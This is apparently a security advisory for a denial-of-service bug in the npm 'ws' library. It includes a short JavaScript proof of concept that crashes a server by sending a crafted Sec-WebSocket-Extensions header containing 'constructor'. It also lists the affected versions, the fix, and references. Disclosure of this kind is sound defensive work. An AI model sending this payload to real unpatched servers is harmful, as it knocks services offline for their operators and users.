GHSA-5v72-xg48-5rpmHighCVSS 7.5Disclosed before NVD
Denial of Service in ws
๐ Description
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
Proof of concept
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Recommendation
Update to version 3.3.1 or later.
๐ฏ Affected products2
- npm/ws:>= 2.0.0, < 3.3.1
- npm/ws:>= 0.6.0, < 1.1.5
๐ References (5)
- https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
- https://snyk.io/vuln/npm:ws:20171108
- https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
- https://github.com/websockets/ws/commit/a810bfa44f08c84ff3f43cc71327e9bb5fb273ef
- https://github.com/advisories/GHSA-5v72-xg48-5rpm